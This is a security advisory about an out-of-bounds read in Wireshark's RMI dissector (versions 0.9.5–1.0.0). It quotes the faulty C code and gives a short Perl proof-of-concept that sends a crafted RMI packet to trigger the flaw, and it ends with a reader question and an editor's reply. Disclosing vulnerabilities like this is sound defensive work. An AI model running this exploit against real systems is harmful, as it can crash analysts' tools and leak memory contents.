|
Brought to you by:
Suppliers of:
|
|
|
| |
| A vulnerability in the way Wireshark handles RMI packets allows attackers to cause the Wireshark program to read beyond the buffer used to store data, which in turn allows the attacker to read arbitrary memory and also crash the Wireshark product. |
| |
Credit:
The information has been provided by beSTORM.
|
| |
Vulnerable Systems:
* Wireshark version 0.9.5 through 1.0.0
Immune Systems:
* Wireshark version 1.0.1 and newer
The RMI dissector was using g_strlcpy incorrectly, which could lead to information disclosure or worse.
The vulnerability is caused by faulty code:
len = tvb_get_ntohs(tvb, 1);
proto_tree_add_uint(rmi_tree, hf_rmi_epid_length,
tvb, offset + 1, 2, len);
memset(epid_hostname, 0, sizeof(epid_hostname));
if (len < sizeof(epid_hostname)) {
g_strlcpy(epid_hostname,tvb_get_ptr(tvb, offset + 3, len),
sizeof(epid_hostname));
} else {
g_strlcpy(epid_hostname,
"<string too long>", sizeof(epid_hostname));
}
* len is user provided
* g_strlcpy doesn't verify there is actually something to read, which means that we can supply that we want it to read X, while the packet contains less (no biggy yet)
* If a RMI packet contains:
1) Very little information to copy from
2) Small value of len
3) No NULL termination
The displayed data (by Wireshark) will include previous data from the stack.
Exploit:
use IO::Socket;
my $data = "";
my $length = pack('n', length($data));
my $request_input_ack =
"\x4e". # ACK code
"$length".
"$data".
"\x41\x41". # dead bytes?
"\x01\x01"; #port
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => '192.168.1.52', PeerPort => "1099");
unless ($remote) { die "cannot connect to daemon on 192.168.1.52" }
print $remote $request_input_ack;
sleep(1);
|
| Subject:
|
How is this an information disclosure |
Date: |
7 Aug. 2008 |
| From: |
duper |
I understand that this is a problem because it corrupts the memory of WireShark which leads to a DoS but how is it an information disclosure? Isn't the user of WireShark able to read the data on their own stack anyway??
-- Editor note: Information disclosure is considered whenever a program displays data it shouldn't. This is what is happening in Wireshark when it processes this packet |
|
|
|
|
|
|
